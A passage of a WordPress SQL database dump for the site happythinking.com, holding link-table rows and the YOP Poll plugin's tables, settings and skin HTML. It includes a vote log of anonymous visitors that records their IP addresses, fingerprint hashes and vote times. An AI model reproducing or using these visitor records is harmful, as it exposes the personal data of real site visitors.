(180, 'https://www.happythinking.com/', 1641, NULL, 'internal', 40, 9, NULL, NULL, NULL, NULL, NULL),
(303, 'https://www.happythinking.com/negative-core-beliefs/', 1641, 1632, 'internal', 40, 38, NULL, NULL, NULL, NULL, NULL),
(342, 'https://www.happythinking.com/introduction/', 1616, 1034, 'internal', 35, 28, NULL, NULL, NULL, NULL, NULL),
(231, 'https://www.happythinking.com/all-or-nothing-thinking/', 1620, 1627, 'internal', 36, 37, NULL, NULL, NULL, NULL, NULL),
(233, 'https://www.happythinking.com/negative-core-beliefs/', 1627, 1632, 'internal', 37, 38, NULL, NULL, NULL, NULL, NULL),
(232, 'https://www.happythinking.com/catastrophic-thinking/', 1627, 1620, 'internal', 37, 36, NULL, NULL, NULL, NULL, NULL),
(167, 'https://www.happythinking.com/', 1627, NULL, 'internal', 37, 9, NULL, NULL, NULL, NULL, NULL),
(234, 'https://www.happythinking.com/all-or-nothing-thinking/', 1632, 1627, 'internal', 38, 37, NULL, NULL, NULL, NULL, NULL),
(171, 'https://www.happythinking.com/', 1632, NULL, 'internal', 38, 9, NULL, NULL, NULL, NULL, NULL),
(229, 'https://www.happythinking.com/negativity-effect/', 1620, 1616, 'internal', 36, 35, NULL, NULL, NULL, NULL, NULL),
(161, 'https://www.happythinking.com/', 1620, NULL, 'internal', 36, 9, NULL, NULL, NULL, NULL, NULL),
(405, 'https://www.happythinking.com/wp-content/uploads/cauldron_060823.jpg', 2110, 2054, 'image-in', 66, NULL, 600, 600, 126975, NULL, NULL),
(404, 'https://www.happythinking.com/wp-content/uploads/home_happythinking080723.jpg', 2110, 2059, 'image-in', 66, NULL, 450, 600, 70782, NULL, NULL),
(151, 'https://www.happythinking.com/', 1034, NULL, 'internal', 28, 9, NULL, NULL, NULL, NULL, NULL),
(136, 'https://www.happythinking.com', 1034, 88, 'internal', 28, 10, NULL, NULL, NULL, NULL, NULL),
(295, 'https://www.happythinking.com/wp-content/uploads/tiger_memory_170623.jpg', 1616, 1858, 'image-in', 35, NULL, 600, 600, 336823, NULL, NULL),
(211, 'https://www.happythinking.com', 1667, 88, 'internal', 47, 10, NULL, NULL, NULL, NULL, NULL),
(353, 'https://www.happythinking.com/gratitude/', 1667, 1664, 'internal', 47, 46, NULL, NULL, NULL, NULL, NULL),
(339, 'https://www.happythinking.com/wp-content/uploads/patternrecognition170623a.gif', 1034, 1883, 'image-in', 28, NULL, 600, 600, 72504, NULL, NULL),
(370, 'https://www.happythinking.com', 1994, 88, 'internal', 63, 10, NULL, NULL, NULL, NULL, NULL),
(205, 'https://www.happythinking.com/', 1664, NULL, 'internal', 46, 9, NULL, NULL, NULL, NULL, NULL),
(210, 'https://www.happythinking.com/conclusion/', 1664, 1667, 'internal', 46, 47, NULL, NULL, NULL, NULL, NULL),
(352, 'https://www.happythinking.com/other-possibilities/', 1664, 1661, 'internal', 46, 45, NULL, NULL, NULL, NULL, NULL),
(201, 'https://www.happythinking.com/', 1661, NULL, 'internal', 45, 9, NULL, NULL, NULL, NULL, NULL),
(392, 'https://www.happythinking.com/reality-check/', 1661, 1655, 'internal', 45, 43, NULL, NULL, NULL, NULL, NULL),
(395, 'https://www.happythinking.com/donate/', 1667, 455, 'internal', 47, 21, NULL, NULL, NULL, NULL, NULL),
(197, 'https://www.happythinking.com/', 1658, NULL, 'internal', 44, 9, NULL, NULL, NULL, NULL, NULL),
(349, 'https://www.happythinking.com/other-possibilities/', 1658, 1661, 'internal', 44, 45, NULL, NULL, NULL, NULL, NULL),
(394, 'https://www.happythinking.com/gratitude/', 1658, 1664, 'internal', 44, 46, NULL, NULL, NULL, NULL, NULL),
(193, 'https://www.happythinking.com/', 1655, NULL, 'internal', 43, 9, NULL, NULL, NULL, NULL, NULL),
(345, 'https://www.happythinking.com/pause/', 1655, 1650, 'internal', 43, 42, NULL, NULL, NULL, NULL, NULL),
(391, 'https://www.happythinking.com/other-possibilities/', 1655, 1661, 'internal', 43, 45, NULL, NULL, NULL, NULL, NULL),
(189, 'https://www.happythinking.com/', 1650, NULL, 'internal', 42, 9, NULL, NULL, NULL, NULL, NULL),
(346, 'https://www.happythinking.com/reality-check/', 1650, 1655, 'internal', 42, 43, NULL, NULL, NULL, NULL, NULL),
(242, 'https://www.happythinking.com/inner-voice/', 1650, 1646, 'internal', 42, 41, NULL, NULL, NULL, NULL, NULL),
(184, 'https://www.happythinking.com/', 1646, NULL, 'internal', 41, 9, NULL, NULL, NULL, NULL, NULL),
(240, 'https://www.happythinking.com/psychological-tools/', 1646, 1641, 'internal', 41, 40, NULL, NULL, NULL, NULL, NULL),
(344, 'https://www.happythinking.com/pause/', 1646, 1650, 'internal', 41, 42, NULL, NULL, NULL, NULL, NULL),
(239, 'https://www.happythinking.com/inner-voice/', 1641, 1646, 'internal', 40, 41, NULL, NULL, NULL, NULL, NULL),
(212, 'https://www.happythinking.com', 451, 88, 'internal', 20, 10, NULL, NULL, NULL, NULL, NULL),
(122, 'https://www.stopstupidthinking.com/', 455, NULL, 'external', 21, NULL, NULL, NULL, NULL, NULL, NULL),
(137, 'https://www.happythinking.com', 466, 88, 'internal', 22, 10, NULL, NULL, NULL, NULL, NULL),
(385, 'https://www.happythinking.com/wp-content/uploads/two_unhappy_faces_21_7_2023.jpg', 1034, 2039, 'image-in', 28, NULL, 600, 600, 217371, NULL, NULL),
(386, 'https://www.happythinking.com/wp-content/uploads/one_unhappy_faces_21_7_2023.jpg', 1034, 2040, 'image-in', 28, NULL, 600, 600, 207363, NULL, NULL),
(396, 'https://www.happythinking.com/donate/', 466, 455, 'internal', 22, 21, NULL, NULL, NULL, NULL, NULL),
(390, 'https://www.happythinking.com/wp-content/uploads/home_happythinking080723.jpg', 88, 2059, 'image-in', 10, NULL, 450, 600, 70782, NULL, NULL),
(287, 'https://www.happythinking.com/wp-content/uploads/twospheres_160623.jpg', 1616, 1829, 'image-in', 35, NULL, 600, 600, 111249, NULL, NULL),
(288, 'https://www.happythinking.com/wp-content/uploads/unbalanced_160623.jpg', 1616, 1834, 'image-in', 35, NULL, 600, 600, 117470, NULL, NULL),
(289, 'https://www.happythinking.com/wp-content/uploads/balanced_160623.jpg', 1616, 1835, 'image-in', 35, NULL, 600, 600, 108940, NULL, NULL),
(294, 'https://www.happythinking.com/wp-content/uploads/tigerouch_170623.jpg', 1616, 1857, 'image-in', 35, NULL, 600, 600, 338017, NULL, NULL),
(298, 'https://www.happythinking.com/wp-content/uploads/all_cups_170623b.jpg', 1627, 1877, 'image-in', 37, NULL, 600, 600, 71863, NULL, NULL),
(384, 'https://www.happythinking.com/wp-content/uploads/unhappycloudsface_21_7_2023.jpg', 1034, 2038, 'image-in', 28, NULL, 600, 600, 296485, NULL, NULL);

-- --------------------------------------------------------

--
-- Table structure for table `wpou_yoppoll_bans`
--

CREATE TABLE `wpou_yoppoll_bans` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `author` bigint(20) NOT NULL,
  `poll_id` int(11) NOT NULL,
  `b_by` varchar(255) NOT NULL,
  `b_value` varchar(255) NOT NULL,
  `added_date` datetime NOT NULL,
  `modified_date` datetime NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;

-- --------------------------------------------------------

--
-- Table structure for table `wpou_yoppoll_elements`
--

CREATE TABLE `wpou_yoppoll_elements` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `poll_id` int(11) NOT NULL,
  `etext` text NOT NULL,
  `author` bigint(20) NOT NULL,
  `etype` varchar(20) NOT NULL,
  `status` varchar(20) NOT NULL,
  `sorder` int(11) NOT NULL,
  `meta_data` longtext NOT NULL,
  `added_date` datetime NOT NULL,
  `modified_date` datetime NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM  DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;

--
-- Dumping data for table `wpou_yoppoll_elements`
--

INSERT INTO `wpou_yoppoll_elements` VALUES
(1, 1, 'Please click on the name you think is better and then click submit button. Thanks!', 1, 'text-question', 'active', 1, 'a:11:{s:17:"allowOtherAnswers";s:2:"no";s:17:"otherAnswersLabel";s:5:"Other";s:15:"addOtherAnswers";s:2:"no";s:28:"displayOtherAnswersInResults";s:2:"no";s:27:"resultsColorForOtherAnswers";s:7:"#000000";s:20:"allowMultipleAnswers";s:2:"no";s:20:"multipleAnswersMinim";s:1:"1";s:20:"multipleAnswersMaxim";s:1:"1";s:14:"answersDisplay";s:8:"vertical";s:14:"answersColumns";s:0:"";s:11:"answersSort";s:10:"as-defined";}', '2023-06-21 09:34:15', '2023-07-03 05:47:50');

-- --------------------------------------------------------

--
-- Table structure for table `wpou_yoppoll_logs`
--

CREATE TABLE `wpou_yoppoll_logs` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `poll_id` int(11) NOT NULL,
  `poll_author` bigint(20) NOT NULL,
  `user_id` bigint(20) NOT NULL,
  `user_email` varchar(255) DEFAULT NULL,
  `user_type` varchar(100) NOT NULL,
  `ipaddress` varchar(100) NOT NULL,
  `tracking_id` varchar(255) NOT NULL,
  `voter_id` varchar(255) NOT NULL,
  `voter_fingerprint` varchar(255) NOT NULL,
  `vote_data` longtext NOT NULL,
  `vote_message` longtext NOT NULL,
  `added_date` datetime NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM  DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;

--
-- Dumping data for table `wpou_yoppoll_logs`
--

INSERT INTO `wpou_yoppoll_logs` VALUES
(1, 1, 1, 0, '', 'anonymous', '110.224.104.48', '', '5296b713eb12dcf393339e3aa14eca02', '', 'a:3:{s:8:"elements";a:1:{i:0;a:3:{s:2:"id";s:1:"1";s:4:"type";s:8:"question";s:4:"data";a:1:{i:0;a:2:{s:2:"id";s:1:"1";s:4:"data";s:1:"1";}}}}s:4:"user";a:2:{s:10:"first_name";s:0:"";s:9:"last_name";s:0:"";}s:9:"meta_data";a:1:{s:7:"page_id";s:2:"88";}}', 'a:1:{i:0;s:7:"success";}', '2023-06-21 09:51:26'),
(2, 1, 1, 0, '', 'anonymous', '117.98.32.85', '', '169d6aa719869bbd48c6b1994bf062b4', '', 'a:3:{s:8:"elements";a:1:{i:0;a:3:{s:2:"id";s:1:"1";s:4:"type";s:8:"question";s:4:"data";a:1:{i:0;a:2:{s:2:"id";s:1:"2";s:4:"data";s:1:"1";}}}}s:4:"user";a:2:{s:10:"first_name";s:0:"";s:9:"last_name";s:0:"";}s:9:"meta_data";a:1:{s:7:"page_id";s:2:"88";}}', 'a:1:{i:0;s:7:"success";}', '2023-06-21 10:11:42'),
(3, 1, 1, 0, '', 'anonymous', '157.48.158.239', '', '52d69bfa9acd164b434621726c31e89f', '', 'a:3:{s:8:"elements";a:1:{i:0;a:3:{s:2:"id";s:1:"1";s:4:"type";s:8:"question";s:4:"data";a:1:{i:0;a:2:{s:2:"id";s:1:"1";s:4:"data";s:1:"1";}}}}s:4:"user";a:2:{s:10:"first_name";s:0:"";s:9:"last_name";s:0:"";}s:9:"meta_data";a:1:{s:7:"page_id";s:4:"1034";}}', 'a:1:{i:0;s:7:"success";}', '2023-06-21 15:14:30'),
(4, 1, 1, 0, '', 'anonymous', '85.255.236.224', '', '4b8b0644fafd7130420d6fd20b2faa4f', '', 'a:3:{s:8:"elements";a:1:{i:0;a:3:{s:2:"id";s:1:"1";s:4:"type";s:8:"question";s:4:"data";a:1:{i:0;a:2:{s:2:"id";s:1:"1";s:4:"data";s:1:"1";}}}}s:4:"user";a:2:{s:10:"first_name";s:0:"";s:9:"last_name";s:0:"";}s:9:"meta_data";a:1:{s:7:"page_id";s:2:"88";}}', 'a:1:{i:0;s:7:"success";}', '2023-06-26 10:38:22'),
(5, 1, 1, 0, '', 'anonymous', '85.255.236.224', '', '4b8b0644fafd7130420d6fd20b2faa4f', '', 'a:3:{s:8:"elements";a:1:{i:0;a:3:{s:2:"id";s:1:"1";s:4:"type";s:8:"question";s:4:"data";a:1:{i:0;a:2:{s:2:"id";s:1:"2";s:4:"data";s:1:"1";}}}}s:4:"user";a:2:{s:10:"first_name";s:0:"";s:9:"last_name";s:0:"";}s:9:"meta_data";a:1:{s:7:"page_id";s:2:"88";}}', 'a:1:{i:0;s:7:"success";}', '2023-06-26 10:55:38'),
(6, 1, 1, 0, '', 'anonymous', '103.211.134.192', '', '66e5ed3c0a02ad9dfff9af801f9c61de', '', 'a:3:{s:8:"elements";a:1:{i:0;a:3:{s:2:"id";s:1:"1";s:4:"type";s:8:"question";s:4:"data";a:1:{i:0;a:2:{s:2:"id";s:1:"1";s:4:"data";s:1:"1";}}}}s:4:"user";a:2:{s:10:"first_name";s:0:"";s:9:"last_name";s:0:"";}s:9:"meta_data";a:1:{s:7:"page_id";s:2:"88";}}', 'a:1:{i:0;s:7:"success";}', '2023-06-30 16:07:35'),
(7, 1, 1, 0, '', 'anonymous', '103.211.134.192', '', '66e5ed3c0a02ad9dfff9af801f9c61de', '', 'a:3:{s:8:"elements";a:1:{i:0;a:3:{s:2:"id";s:1:"1";s:4:"type";s:8:"question";s:4:"data";a:1:{i:0;a:2:{s:2:"id";s:1:"1";s:4:"data";s:1:"1";}}}}s:4:"user";a:2:{s:10:"first_name";s:0:"";s:9:"last_name";s:0:"";}s:9:"meta_data";a:1:{s:7:"page_id";s:2:"88";}}', 'a:1:{i:0;s:7:"success";}', '2023-06-30 16:07:44'),
(8, 1, 1, 0, '', 'anonymous', '90.203.140.198', '', '0bbe368d06ffd16a489eb18d0fcd8cba', '', 'a:3:{s:8:"elements";a:1:{i:0;a:3:{s:2:"id";s:1:"1";s:4:"type";s:8:"question";s:4:"data";a:1:{i:0;a:2:{s:2:"id";s:1:"1";s:4:"data";s:1:"1";}}}}s:4:"user";a:2:{s:10:"first_name";s:0:"";s:9:"last_name";s:0:"";}s:9:"meta_data";a:1:{s:7:"page_id";s:2:"88";}}', 'a:1:{i:0;s:7:"success";}', '2023-06-30 18:48:42'),
(9, 1, 1, 0, '', 'anonymous', '90.204.107.214', '', 'c442d2db560ba6c49488d06f636a7e1f', '', 'a:3:{s:8:"elements";a:1:{i:0;a:3:{s:2:"id";s:1:"1";s:4:"type";s:8:"question";s:4:"data";a:1:{i:0;a:2:{s:2:"id";s:1:"3";s:4:"data";s:1:"1";}}}}s:4:"user";a:2:{s:10:"first_name";s:0:"";s:9:"last_name";s:0:"";}s:9:"meta_data";a:1:{s:7:"page_id";s:2:"88";}}', 'a:1:{i:0;s:7:"success";}', '2023-06-30 19:25:43'),
(10, 1, 1, 0, '', 'anonymous', '49.36.106.206', '', 'bb03d6a9e0cdcf4611e25231a86214eb', '', 'a:3:{s:8:"elements";a:1:{i:0;a:3:{s:2:"id";s:1:"1";s:4:"type";s:8:"question";s:4:"data";a:1:{i:0;a:2:{s:2:"id";s:1:"3";s:4:"data";s:1:"1";}}}}s:4:"user";a:2:{s:10:"first_name";s:0:"";s:9:"last_name";s:0:"";}s:9:"meta_data";a:1:{s:7:"page_id";s:2:"88";}}', 'a:1:{i:0;s:7:"success";}', '2023-07-02 15:46:07'),
(11, 1, 1, 0, '', 'anonymous', '106.192.29.71', '', '3ef51acd5e5d256b8351fb871e8be528', '', 'a:3:{s:8:"elements";a:1:{i:0;a:3:{s:2:"id";s:1:"1";s:4:"type";s:8:"question";s:4:"data";a:1:{i:0;a:2:{s:2:"id";s:1:"3";s:4:"data";s:1:"1";}}}}s:4:"user";a:2:{s:10:"first_name";s:0:"";s:9:"last_name";s:0:"";}s:9:"meta_data";a:1:{s:7:"page_id";s:2:"88";}}', 'a:1:{i:0;s:7:"success";}', '2023-07-02 16:15:13'),
(12, 1, 1, 0, '', 'anonymous', '106.211.60.34', '', '55ec175646b2efc1babca5bcbcdc8699', '', 'a:3:{s:8:"elements";a:1:{i:0;a:3:{s:2:"id";s:1:"1";s:4:"type";s:8:"question";s:4:"data";a:1:{i:0;a:2:{s:2:"id";s:1:"3";s:4:"data";s:1:"1";}}}}s:4:"user";a:2:{s:10:"first_name";s:0:"";s:9:"last_name";s:0:"";}s:9:"meta_data";a:1:{s:7:"page_id";s:2:"88";}}', 'a:1:{i:0;s:7:"success";}', '2023-07-02 17:03:25'),
(13, 1, 1, 0, '', 'anonymous', '45.114.192.5', '', 'b17531fd7d78085a9b259c13c6fb910a', '', 'a:3:{s:8:"elements";a:1:{i:0;a:3:{s:2:"id";s:1:"1";s:4:"type";s:8:"question";s:4:"data";a:1:{i:0;a:2:{s:2:"id";s:1:"1";s:4:"data";s:1:"1";}}}}s:4:"user";a:2:{s:10:"first_name";s:0:"";s:9:"last_name";s:0:"";}s:9:"meta_data";a:1:{s:7:"page_id";s:2:"88";}}', 'a:1:{i:0;s:7:"success";}', '2023-07-02 17:03:59'),
(14, 1, 1, 0, '', 'anonymous', '45.114.192.5', '', 'b17531fd7d78085a9b259c13c6fb910a', '', 'a:3:{s:8:"elements";a:1:{i:0;a:3:{s:2:"id";s:1:"1";s:4:"type";s:8:"question";s:4:"data";a:1:{i:0;a:2:{s:2:"id";s:1:"1";s:4:"data";s:1:"1";}}}}s:4:"user";a:2:{s:10:"first_name";s:0:"";s:9:"last_name";s:0:"";}s:9:"meta_data";a:1:{s:7:"page_id";s:2:"88";}}', 'a:1:{i:0;s:7:"success";}', '2023-07-02 17:04:03'),
(15, 1, 1, 0, '', 'anonymous', '27.61.14.117', '', '095f4185ac80f302442462f2f3501549', '', 'a:3:{s:8:"elements";a:1:{i:0;a:3:{s:2:"id";s:1:"1";s:4:"type";s:8:"question";s:4:"data";a:1:{i:0;a:2:{s:2:"id";s:1:"3";s:4:"data";s:1:"1";}}}}s:4:"user";a:2:{s:10:"first_name";s:0:"";s:9:"last_name";s:0:"";}s:9:"meta_data";a:1:{s:7:"page_id";s:2:"88";}}', 'a:1:{i:0;s:7:"success";}', '2023-07-02 17:06:18'),
(16, 1, 1, 0, '', 'anonymous', '45.114.192.5', '', 'b17531fd7d78085a9b259c13c6fb910a', '', 'a:3:{s:8:"elements";a:1:{i:0;a:3:{s:2:"id";s:1:"1";s:4:"type";s:8:"question";s:4:"data";a:1:{i:0;a:2:{s:2:"id";s:1:"3";s:4:"data";s:1:"1";}}}}s:4:"user";a:2:{s:10:"first_name";s:0:"";s:9:"last_name";s:0:"";}s:9:"meta_data";a:1:{s:7:"page_id";s:2:"88";}}', 'a:1:{i:0;s:7:"success";}', '2023-07-02 17:16:11'),
(17, 1, 1, 0, '', 'anonymous', '42.111.114.16', '', '29ed81295bed00c9ef0d9927d2ecbceb', '', 'a:3:{s:8:"elements";a:1:{i:0;a:3:{s:2:"id";s:1:"1";s:4:"type";s:8:"question";s:4:"data";a:1:{i:0;a:2:{s:2:"id";s:1:"3";s:4:"data";s:1:"1";}}}}s:4:"user";a:2:{s:10:"first_name";s:0:"";s:9:"last_name";s:0:"";}s:9:"meta_data";a:1:{s:7:"page_id";s:2:"88";}}', 'a:1:{i:0;s:7:"success";}', '2023-07-02 17:46:43'),
(18, 1, 1, 0, '', 'anonymous', '152.58.225.114', '', 'c8cd318f587be0a573a9249fbb1084da', '', 'a:3:{s:8:"elements";a:1:{i:0;a:3:{s:2:"id";s:1:"1";s:4:"type";s:8:"question";s:4:"data";a:1:{i:0;a:2:{s:2:"id";s:1:"3";s:4:"data";s:1:"1";}}}}s:4:"user";a:2:{s:10:"first_name";s:0:"";s:9:"last_name";s:0:"";}s:9:"meta_data";a:1:{s:7:"page_id";s:2:"88";}}', 'a:1:{i:0;s:7:"success";}', '2023-07-03 09:37:25'),
(19, 1, 1, 0, '', 'anonymous', '49.43.154.205', '', '989b1c42997e82135be2c8c4e948064f', '', 'a:3:{s:8:"elements";a:1:{i:0;a:3:{s:2:"id";s:1:"1";s:4:"type";s:8:"question";s:4:"data";a:1:{i:0;a:2:{s:2:"id";s:1:"1";s:4:"data";s:1:"1";}}}}s:4:"user";a:2:{s:10:"first_name";s:0:"";s:9:"last_name";s:0:"";}s:9:"meta_data";a:1:{s:7:"page_id";s:4:"1034";}}', 'a:1:{i:0;s:7:"success";}', '2023-07-03 11:43:11'),
(20, 1, 1, 0, '', 'anonymous', '157.46.121.67', '', '2b315d55a21866aa7b6dd3e79b051b7d', '', 'a:3:{s:8:"elements";a:1:{i:0;a:3:{s:2:"id";s:1:"1";s:4:"type";s:8:"question";s:4:"data";a:1:{i:0;a:2:{s:2:"id";s:1:"3";s:4:"data";s:1:"1";}}}}s:4:"user";a:2:{s:10:"first_name";s:0:"";s:9:"last_name";s:0:"";}s:9:"meta_data";a:1:{s:7:"page_id";s:4:"1034";}}', 'a:1:{i:0;s:7:"success";}', '2023-07-03 16:45:26'),
(21, 1, 1, 0, '', 'anonymous', '157.46.121.67', '', '2b315d55a21866aa7b6dd3e79b051b7d', '', 'a:3:{s:8:"elements";a:1:{i:0;a:3:{s:2:"id";s:1:"1";s:4:"type";s:8:"question";s:4:"data";a:1:{i:0;a:2:{s:2:"id";s:1:"1";s:4:"data";s:1:"1";}}}}s:4:"user";a:2:{s:10:"first_name";s:0:"";s:9:"last_name";s:0:"";}s:9:"meta_data";a:1:{s:7:"page_id";s:4:"1034";}}', 'a:1:{i:0;s:7:"success";}', '2023-07-03 16:47:34'),
(22, 1, 1, 0, '', 'anonymous', '27.58.214.104', '', 'd78743318d4e81320e32f65c6bffc440', '', 'a:3:{s:8:"elements";a:1:{i:0;a:3:{s:2:"id";s:1:"1";s:4:"type";s:8:"question";s:4:"data";a:1:{i:0;a:2:{s:2:"id";s:1:"3";s:4:"data";s:1:"1";}}}}s:4:"user";a:2:{s:10:"first_name";s:0:"";s:9:"last_name";s:0:"";}s:9:"meta_data";a:1:{s:7:"page_id";s:4:"1034";}}', 'a:1:{i:0;s:7:"success";}', '2023-07-03 17:05:17');

-- --------------------------------------------------------

--
-- Table structure for table `wpou_yoppoll_other_answers`
--

CREATE TABLE `wpou_yoppoll_other_answers` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `poll_id` int(11) NOT NULL,
  `element_id` int(11) NOT NULL,
  `vote_id` int(11) NOT NULL,
  `answer` longtext NOT NULL,
  `status` varchar(10) NOT NULL,
  `added_date` datetime NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;

-- --------------------------------------------------------

--
-- Table structure for table `wpou_yoppoll_polls`
--

CREATE TABLE `wpou_yoppoll_polls` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `name` varchar(255) NOT NULL,
  `template` int(11) NOT NULL,
  `template_base` varchar(255) NOT NULL,
  `skin_base` varchar(255) NOT NULL,
  `author` bigint(20) NOT NULL,
  `stype` varchar(20) NOT NULL,
  `status` varchar(20) NOT NULL,
  `meta_data` longtext NOT NULL,
  `total_submits` int(11) NOT NULL,
  `total_submited_answers` int(11) NOT NULL,
  `added_date` datetime NOT NULL,
  `modified_date` datetime NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM  DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;

--
-- Dumping data for table `wpou_yoppoll_polls`
--

INSERT INTO `wpou_yoppoll_polls` VALUES
(1, 'happy survey', 1, 'basic', 'white-v2', 1, 'poll', 'published', 'a:2:{s:5:"style";a:7:{s:4:"poll";a:6:{s:15:"backgroundColor";s:7:"#ffffff";s:10:"borderSize";s:1:"1";s:11:"borderColor";s:7:"#000000";s:12:"borderRadius";s:1:"5";s:16:"paddingLeftRight";s:2:"10";s:16:"paddingTopBottom";s:2:"10";}s:9:"questions";a:4:{s:9:"textColor";s:7:"#000000";s:8:"textSize";s:2:"16";s:10:"textWeight";s:6:"normal";s:9:"textAlign";s:6:"center";}s:7:"answers";a:7:{s:16:"paddingLeftRight";s:1:"0";s:16:"paddingTopBottom";s:1:"0";s:9:"textColor";s:7:"#000000";s:8:"textSize";s:2:"14";s:10:"textWeight";s:6:"normal";s:4:"skin";s:7:"minimal";s:11:"colorScheme";s:5:"black";}s:7:"buttons";a:9:{s:15:"backgroundColor";s:7:"#b5f1ff";s:10:"borderSize";s:1:"1";s:11:"borderColor";s:7:"#000000";s:12:"borderRadius";s:2:"30";s:16:"paddingLeftRight";s:2:"10";s:16:"paddingTopBottom";s:1:"5";s:9:"textColor";s:7:"#000000";s:8:"textSize";s:2:"14";s:10:"textWeight";s:6:"normal";}s:7:"captcha";a:0:{}s:6:"errors";a:7:{s:25:"borderLeftColorForSuccess";s:7:"#008000";s:23:"borderLeftColorForError";s:7:"#ff0000";s:14:"borderLeftSize";s:2:"10";s:16:"paddingTopBottom";s:1:"0";s:9:"textColor";s:7:"#000000";s:8:"textSize";s:2:"14";s:10:"textWeight";s:6:"normal";}s:6:"custom";a:1:{s:3:"css";s:0:"";}}s:7:"options";a:3:{s:4:"poll";a:31:{s:15:"voteButtonLabel";s:32:"click here to submit your choice";s:15:"showResultsLink";s:2:"no";s:16:"resultsLabelText";s:7:"Results";s:14:"showTotalVotes";s:2:"no";s:16:"showTotalAnswers";s:2:"no";s:15:"startDateOption";s:3:"now";s:15:"startDateCustom";s:0:"";s:13:"endDateOption";s:5:"never";s:13:"endDateCustom";s:0:"";s:17:"redirectAfterVote";s:2:"no";s:11:"redirectUrl";s:0:"";s:13:"redirectAfter";s:0:"";s:27:"resetPollStatsAutomatically";s:2:"no";s:16:"resetPollStatsOn";s:0:"";s:19:"resetPollStatsEvery";s:2:"24";s:25:"resetPollStatsEveryPeriod";s:5:"hours";s:20:"autoGeneratePollPage";s:2:"no";s:6:"pageId";s:0:"";s:8:"pageLink";s:0:"";s:10:"useCaptcha";s:2:"no";s:22:"sendEmailNotifications";s:2:"no";s:26:"emailNotificationsFromName";s:14:"Your Name Here";s:27:"emailNotificationsFromEmail";s:23:"Your Email Address Here";s:28:"emailNotificationsRecipients";s:0:"";s:25:"emailNotificationsSubject";s:39:"New vote for %POLL-NAME% on %VOTE-DATE%";s:25:"emailNotificationsMessage";s:289:"There is a new vote for %POLL-NAME%\n									Here are the details\n\n									[QUESTION]\n									Question - %QUESTION-TEXT%\n									Answer - %ANSWER-VALUE%\n									[/QUESTION]\n\n									[CUSTOM_FIELDS]\n									%CUSTOM_FIELD_NAME% - %CUSTOM_FIELD_VALUE%\n									[/CUSTOM_FIELDS]\n								";s:10:"enableGdpr";s:2:"no";s:12:"gdprSolution";s:7:"consent";s:15:"gdprConsentText";s:0:"";s:12:"loadWithAjax";s:2:"no";s:27:"notificationMessageLocation";s:3:"top";}s:7:"results";a:9:{s:17:"showResultsMoment";a:1:{i:0;s:5:"never";}s:17:"customDateResults";s:0:"";s:13:"showResultsTo";a:0:{}s:14:"resultsDetails";a:2:{i:0;s:12:"votes-number";i:1;s:11:"percentages";}s:16:"backToVoteOption";s:2:"no";s:17:"backToVoteCaption";s:12:"Back to vote";s:11:"sortResults";s:10:"as-defined";s:15:"sortResultsRule";s:3:"asc";s:16:"displayResultsAs";s:3:"bar";}s:6:"access";a:7:{s:15:"votePermissions";a:1:{i:0;s:5:"guest";}s:11:"blockVoters";a:1:{i:0;s:8:"no-block";}s:15:"blockLengthType";s:7:"forever";s:13:"blockForValue";s:0:"";s:14:"blockForPeriod";s:7:"minutes";s:17:"limitVotesPerUser";s:2:"no";s:19:"votesPerUserAllowed";s:0:"";}}}', 5, 5, '2023-06-21 09:34:15', '2023-07-03 05:48:12');

-- --------------------------------------------------------

--
-- Table structure for table `wpou_yoppoll_skins`
--

CREATE TABLE `wpou_yoppoll_skins` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `template_base` varchar(255) NOT NULL,
  `name` varchar(255) NOT NULL,
  `base` varchar(255) NOT NULL,
  `description` text NOT NULL,
  `html_preview` text NOT NULL,
  `skin_type` enum('predefined','custom') DEFAULT 'predefined',
  `author` bigint(20) NOT NULL,
  `meta_data` longtext NOT NULL,
  `added_date` datetime NOT NULL,
  `modified_date` datetime NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM  DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;

--
-- Dumping data for table `wpou_yoppoll_skins`
--

INSERT INTO `wpou_yoppoll_skins` VALUES
(1, 'basic', 'Orange Def', 'orange-def', '', '<div class="basic-yop-poll-container orange-def" style="padding-top: 14px;padding-bottom: 14px;">\n								<div class="row">\n									<div class="col-md-12">\n										<div class="basic-inner">\n											<form class="basic-form">\n												<div class="basic-elements">\n													<div class="basic-element basic-question basic-question-text-vertical">\n														<div class="basic-question-title">\n															<h5>Poll Question</h5>\n														</div><!-- end basic-question-title -->\n														<ul class="basic-answers">\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 1</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 2</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 3</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 4</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 5</label>\n																</div>\n															</li>\n														</ul><!-- end basic-answers -->\n													</div><!-- end basic-element basic-question -->\n													<div class="clearfix"></div>\n												</div><!-- end basic-elements -->\n												<div class="basic-vote">\n													<a href="#" class="button basic-vote-button">Vote</a>\n												</div><!-- end basic-vote -->\n											</form><!-- end 